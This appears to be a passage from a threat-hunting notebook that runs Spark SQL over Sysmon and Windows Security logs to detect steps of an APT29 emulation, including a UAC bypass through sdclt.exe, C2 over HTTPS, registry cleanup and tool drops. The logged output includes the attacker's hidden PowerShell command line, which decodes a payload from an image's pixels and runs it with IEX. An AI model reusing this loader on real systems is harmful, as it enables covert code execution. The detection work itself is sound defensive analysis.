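#   a: 4688 whose creator ProcessId is that control.exe and which was created
#      with TokenElevationType %%1937 and MandatoryLabel S-1-16-12288 (High)
#   c: a's NewProcessId with its "0x" prefix stripped
#   d: 5156 rows whose Process ID, rendered as lower-case hex, equals c
# 4688 stores PIDs as "0x..." hex strings (e.g. 0xba0) while 5156 stores them
# in decimal (e.g. 2976), hence hex(CAST(...)) on the 5156 side and
# split(..., '0x')[1] on the 4688 side.
# Changes vs. the original cell: the join key and the Channel filter of the
# outer query are now qualified with the `d` alias like every other reference
# in this notebook, so the query stays unambiguous if the subquery ever exposes
# a same-named column. Result set is unchanged.
df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT split(a.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
) c
ON LOWER(hex(CAST(d.ProcessId as INT))) = c.NewProcessId
WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 5156

'''
)
df.show(100,truncate = False, vertical = True)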
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | The Windows Filtering Platform has permitted a connection.

Application Information:
	Process ID:		2976
	Application Name:	\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe

Network Information:
	Direction:		Outbound
	Source Address:		10.0.1.4
	Source Port:		59846
	Destination Address:	192.168.0.5
	Destination Port:		443
	Protocol:		6

Filter Information:
	Filter Run-Time ID:	68659
	Layer Name:		Connect
	Layer Run-Time ID:	48 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | The Windows Filtering Platform has permitted a connection.

Application Information:
	Process ID:		2976
	Application Name:	\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe

Network Information:
	Direction:		Outbound
	Source Address:		10.0.1.4
	Source Port:		59845
	Destination Address:	192.168.0.5
	Destination Port:		443
	Protocol:		6

Filter Information:
	Filter Run-Time ID:	68659
	Layer Name:		Connect
	Layer Run-Time ID:	48 

3.B.4. Standard Application Layer Protocol

Procedure: Used HTTPS to transport C2 (192.168.0.5) traffic

Criteria: Evidence that the network data sent over the C2 channel is HTTPS

Detection Type:None(None)

3.B.5. Standard Cryptographic Protocol

Procedure: Used HTTPS to encrypt C2 (192.168.0.5) traffic

Criteria: Evidence that the network data sent over the C2 channel is encrypted

Detection Type:None(None)

3.C.1. Modify Registry

Procedure: Modified the Registry to remove artifacts of COM hijacking

Criteria: Deletion of the HKCU\Software\Classes\Folder\shell\Open\command subkey

Detection Type:Telemetry(Correlated)

Query ID:22A46621-7A92-48C1-81BF-B3937EB4FDC3

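# 3.C.1: Sysmon registry deletions (EventID 12, EventType DeleteKey) of the
# ...\Folder\shell\open\command key by a process whose grandparent's image name
# carries a Unicode bidirectional-control character.
#   a: EventID 1 where ParentImage contains one of U+200E, U+200F, U+202A..U+202E
#   b: EventID 1 children of those processes
#   d: EventID 12 DeleteKey events raised by b on the Folder\shell\open\command key
# NOTE(review): this presumably anchors on the bidi-override-named initial
# payload from the first step of the emulation; those cells are not in view here.
# Sysmon reports the per-user hive as HKU\<SID>_Classes\..., not as
# HKCU\Software\Classes\..., so the key filter matches on the
# Folder\shell\open\command tail only.
# Escaping: Python '''...''' -> Spark SQL literal -> Java regex. One backslash
# reaching the regex engine needs four in this cell (\\\\), so the key-path
# pattern spends eight per literal backslash in the registry path.
# Changes vs. the original cell: the bidi-character alternation was written as
# raw invisible code points and two of its seven alternatives had degraded to
# the mojibake sequence "â€" (which can only match a literal "â€"); it is now
# an explicit, readable \uXXXX character class over the same seven code points.
df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT b.ProcessGuid
    FROM apt29Host b
    INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(ParentImage) RLIKE '.*[\\\\u200E\\\\u200F\\\\u202A-\\\\u202E].*'
    ) a
    ON b.ParentProcessGuid = a.ProcessGuid
    WHERE b.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND b.EventID = 1
) c
ON d.ProcessGuid = c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND d.EventID = 12
  AND LOWER(d.TargetObject) RLIKE '.*\\\\\\\\folder\\\\\\\\shell\\\\\\\\open\\\\\\\\command.*'
  AND d.Message RLIKE '.*EventType: DeleteKey.*'

'''
)
df.show(100,truncate = False, vertical = True)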
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: DeleteKey
UtcTime: 2020-05-02 02:59:15.911
ProcessGuid: {47ab858c-e1f8-5eac-bc03-000000000400}
ProcessId: 3832
Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107_Classes\Folder\shell\open\command 

4.A.1. Remote File Copy

Procedure: Dropped additional tools (SysinternalsSuite.zip) to disk over C2 channel (192.168.0.5)

Criteria: powershell.exe creating the file SysinternalsSuite.zip

Detection Type:Telemetry(Correlated)

Query ID:337EA65D-55A7-4890-BB2A-6A08BB9703E2

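# 4.A.1: Sysmon file creations (EventID 11) of any *.zip by a process whose
# grandparent's image name carries a Unicode bidirectional-control character.
#   a: EventID 1 where ParentImage contains one of U+200E, U+200F, U+202A..U+202E
#   b: EventID 1 children of those processes
#   d: EventID 11 rows raised by b whose TargetFilename ends in .zip
# NOTE(review): the criteria ask for powershell.exe creating SysinternalsSuite.zip,
# but the only row this returns is Draft.Zip under AppData\Roaming at 02:56 UTC,
# presumably from an earlier step. SysinternalsSuite.zip is later expanded from
# Downloads by a descendant of the sdclt.exe -> control.exe -> powershell.exe
# chain (4.A.3 cell), so its EventID 11 most likely sits under that elevated
# lineage rather than under this one; re-anchor the join (and optionally filter
# on the file name) if the intent is the file named in the criteria.
# Escaping: Python '''...''' -> Spark SQL literal -> Java regex, so one
# backslash reaching the regex engine needs four in this cell (\\\\).
# Changes vs. the original cell: the bidi-character alternation was written as
# raw invisible code points and two of its seven alternatives had degraded to
# the mojibake sequence "â€" (which can only match a literal "â€"); it is now
# an explicit, readable \uXXXX character class over the same seven code points.
df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT b.ProcessGuid
    FROM apt29Host b
    INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(ParentImage) RLIKE '.*[\\\\u200E\\\\u200F\\\\u202A-\\\\u202E].*'
    ) a
    ON b.ParentProcessGuid = a.ProcessGuid
    WHERE b.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND b.EventID = 1
) c
ON d.ProcessGuid = c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND d.EventID = 11
  AND LOWER(d.TargetFilename) LIKE '%.zip'

'''
)
df.show(100,truncate = False, vertical = True)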
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | File created:
RuleName: -
UtcTime: 2020-05-02 02:56:18.032
ProcessGuid: {47ab858c-e14e-5eac-ac03-000000000400}
ProcessId: 5944
Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\pbeesly\AppData\Roaming\Draft.Zip
CreationUtcTime: 2020-05-02 02:56:18.032 

4.A.2. PowerShell

Procedure: Spawned interactive powershell.exe

Criteria: powershell.exe spawning from powershell.exe

Detection Type:Telemetry(Correlated)

Query ID:B86F90BD-716C-4432-AE97-901174F111A8

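# 4.A.2 (Sysmon): powershell.exe processes (EventID 1) whose parent is the
# High-integrity child of the sdclt.exe -> control.exe chain, i.e. the elevated
# PowerShell spawning further PowerShell sessions.
#   b: EventID 1, control.exe whose ParentImage is sdclt.exe
#   a: EventID 1, children of that control.exe with IntegrityLevel = High
#   d: EventID 1, powershell.exe whose ParentProcessGuid is a's ProcessGuid
# Changes vs. the original cell: the powershell.exe match is now case-insensitive
# (LOWER(d.Image)) like the other image filters in this notebook. Sysmon does
# not normalise Image casing (this notebook's output shows both
# C:\windows\System32\... and C:\Windows\System32\...), so a case-sensitive LIKE
# could silently miss a spawn. The join's spacing was also tidied.
df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
) c
ON d.ParentProcessGuid = c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND LOWER(d.Image) LIKE '%powershell.exe'

'''
)
df.show(100,truncate = False, vertical = True)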
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 03:05:24.771
ProcessGuid: {47ab858c-e374-5eac-d803-000000000400}
ProcessId: 3852
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ParentProcessId: 2976
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 03:00:13.551
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ParentProcessId: 2976
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 

Query ID:FA520225-1813-4EF2-BA58-98CB59C897D7

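# 4.A.2 (Security log): 4688 process creations of powershell.exe whose creator
# is the elevated PowerShell spawned by the sdclt.exe -> control.exe chain.
#   b: 4688 where control.exe was created by sdclt.exe            -> NewProcessId
#   a: 4688 whose creator ProcessId is that control.exe and which was created
#      with TokenElevationType %%1937 and MandatoryLabel S-1-16-12288 (High)
#   d: 4688 whose creator ProcessId equals a's NewProcessId and whose
#      NewProcessName ends in powershell.exe
# Both sides of the outer join are 4688 "0x..." hex strings, so no PID
# conversion is needed here (unlike the 4688 <-> 5156 correlation in 3.B.3).
# Changes vs. the original cell: the powershell.exe match is now case-insensitive
# (LOWER(d.NewProcessName)) like the other name filters in this notebook.
df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
) c
ON d.ProcessId = c.NewProcessId
WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'

'''
)
df.show(100,truncate = False, vertical = True)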
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf0c
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xba0
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	powershell.exe

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 1--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf24
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xba0
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	powershell.exe

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.A.3. Deobfuscate/Decode Files or Information

Procedure: Decompressed ZIP (SysinternalsSuite.zip) file using PowerShell

Criteria: powershell.exe executing Expand-Archive

Detection Type:Telemetry(Correlated)

Query ID:66B068A4-C3AB-4973-AE07-2C15AFF78104

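# 4.A.3: PowerShell module-logging payloads (EventID 4103) that mention
# Expand-Archive, restricted to the powershell.exe processes spawned by the
# elevated PowerShell of the sdclt.exe -> control.exe chain.
#   b: Sysmon EventID 1, control.exe whose ParentImage is sdclt.exe
#   a: Sysmon EventID 1, children of that control.exe with IntegrityLevel = High
#   d: Sysmon EventID 1, powershell.exe children of a            -> ProcessId
#   f: 4103 rows whose ExecutionProcessID equals that Sysmon ProcessId
# NOTE(review): LIKE "%expand-archive%" also returns the Write-Progress and
# ProgressBarHelper records that merely carry "Expand-Archive" as their
# Activity / cmdletName (see the output below); if only the cmdlet invocation
# is wanted, tighten to LIKE "%commandinvocation(expand-archive)%".
# Changes vs. the original cell: the powershell.exe match is now case-insensitive
# (LOWER(d.Image)) like the other image filters in this notebook, since Sysmon
# does not normalise Image casing. The join's spacing was also tidied.
df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid = c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4103
    AND LOWER(f.Payload) LIKE "%expand-archive%"

'''
)
df.show(100,truncate = False, vertical = True)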
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Expand-Archive): "Expand-Archive"
ParameterBinding(Expand-Archive): name="LiteralPath"; value="C:\Users\pbeesly\Downloads\SysinternalsSuite.zip"
ParameterBinding(Expand-Archive): name="DestinationPath"; value="C:\Users\pbeesly\Downloads\"
ParameterBinding(Expand-Archive): name="Path"; value=""
ParameterBinding(Expand-Archive): name="Force"; value="False"
                                                                                                                                                                                                                                     
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Completed"; value="True"
                                                                                                                                                                                                                                                                                                                                                                                                                               
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="308"
 
-RECORD 3-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 4-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="307"
 
-RECORD 5-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 6-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="306"
 
-RECORD 7-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 8-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="305"
 
-RECORD 9-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 10----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="304"
 
-RECORD 11----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 12----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
